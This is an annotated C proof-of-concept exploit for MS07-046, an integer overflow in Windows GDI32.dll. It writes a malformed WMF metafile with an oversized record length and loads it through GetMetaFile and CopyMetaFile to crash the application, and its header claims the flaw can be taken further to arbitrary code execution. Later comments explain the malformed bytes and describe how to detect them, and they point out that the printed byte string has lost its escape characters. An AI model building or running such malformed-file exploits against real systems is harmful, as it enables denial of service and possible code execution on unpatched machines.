
# Title : MS Windows (GDI32.DLL) Denial of Service Exploit (MS07-046)
# Published : 2007-08-29
# Author : Gil-Dong / Woo-Chi


/*
 * MS07-046(GDI32.dll Integer overflow DOS) Proof Of Concept Code
 
 * by Hong Gil-Dong & Chun Woo-Chi

 * Yang yeon(?~1542), Korea
 * "I shall keep clenching my left fist until I see the real tao".

 * This POC is for testing only. If an application reads a malformed WMF
 * file like the one this POC writes, the application will crash. If you
 * apply this code, you can execute arbitrary code.
 *

 * We tested this code on Windows XP SP2 Korean Edition 
 * (GDI32.dll version 5.1.2600.3099). But it will work well on other
 * systems.
 */

#include <stdio.h>
#include <windows.h>

/*
 * Name of the file the PoC writes its metafile bytes to. It is a relative
 * path, so the file is created in the current working directory.
 */
#define WMF_FILE "ms07-046.wmf"

/* Prints the PoC banner; defined after main(). */
void usage(void);

/*
 * Proof-of-concept driver. Prints the banner, writes the contents of wmf[]
 * to WMF_FILE, then opens that file with GetMetaFile() and hands the
 * resulting handle to CopyMetaFile().
 *
 * Per the header comment, an application that reads a file like this is
 * expected to crash on an affected GDI32.dll; which of the two GDI calls
 * faults is not shown in this listing. The title ties the flaw to Microsoft
 * Security Bulletin MS07-046, i.e. the fix is the update from that bulletin.
 *
 * Returns 0 on every path, including the fopen() failure path, so the exit
 * status cannot be used to tell whether the file was written.
 */
int main()
{
	
	FILE *fp;

	/*
	 * Metafile image that gets written to disk.
	 *
	 * NOTE(review): as printed on this page the literal contains no
	 * backslashes, so it is plain ASCII text ("x01x00..."), not binary data.
	 * The same loss shows in "errorn" below, so the original presumably
	 * used \x escapes -- confirm against an authoritative copy.
	 *
	 * Read as hex byte pairs and laid over the standard WMF layout (my
	 * reading, not stated on the page), the 34 values are:
	 *   - an 18-byte header declaring a file size of 0x11 words (34 bytes)
	 *     and a largest record of 5 words;
	 *   - one record whose 32-bit size field is 0xFFFFFFFF, followed by
	 *     function code 0x0213 and two 16-bit parameters;
	 *   - a 3-word end-of-file record.
	 * The record size is the malformed field: it claims far more words than
	 * the whole file holds. For defenders this is the property to check --
	 * a parser or content filter should reject any record whose declared
	 * size exceeds the bytes remaining in the file.
	 */
	char wmf[] = "x01x00x09x00x00x03x11x00x00x00x00x00"
                 "x05x00x00x00x00x00xFFxFFxFFxFFx13x02"
                 "x32x00x96x00x03x00x00x00x00x00";
	int i;
	
	/* Handle returned by GetMetaFile() for the file written below. */
	HMETAFILE srcMeta;

    usage();

	/*
	 * "w" opens the file in text mode although the content is meant to be
	 * binary; "wb" would be the conventional mode for this kind of data.
	 */
	if ((fp = fopen(WMF_FILE, "w")) == NULL) {
                printf("File %s write errorn", WMF_FILE);
                return 0;
	}

	/*
	 * Write every array element except the terminating NUL that the string
	 * literal adds (hence sizeof(wmf)-1). i is a signed int compared with a
	 * size_t; harmless at this length. fputc() results are not checked.
	 */
	for(i=0; i<sizeof(wmf)-1; i++)
		fputc(wmf[i], fp);

	fclose(fp);

	/*
	 * Load the file just written and copy it. A NULL second argument asks
	 * CopyMetaFile() for an in-memory copy rather than a new file.
	 * Neither return value is checked: if GetMetaFile() fails, a NULL
	 * handle is passed straight to CopyMetaFile(), and neither handle is
	 * released with DeleteMetaFile().
	 */
    srcMeta = GetMetaFile(WMF_FILE);
    CopyMetaFile( srcMeta, NULL);

    return 0;
}

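/*
 * Print the two-line PoC banner (advisory name and author credit) to
 * stdout. Takes no arguments and returns nothing.
 */
void usage(void)
{
    /*
     * Each line ends with a newline escape. The published listing ended
     * these strings with a bare "n", which appears to be an "\n" whose
     * backslash was lost when the page was rendered.
     */
    printf("MS07-046 Windows Meta File RecordParms Integer Overflow \n");
    printf("Proof of Concept by Hong Gil-Dong & Chun Woo-Chi \n");
}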
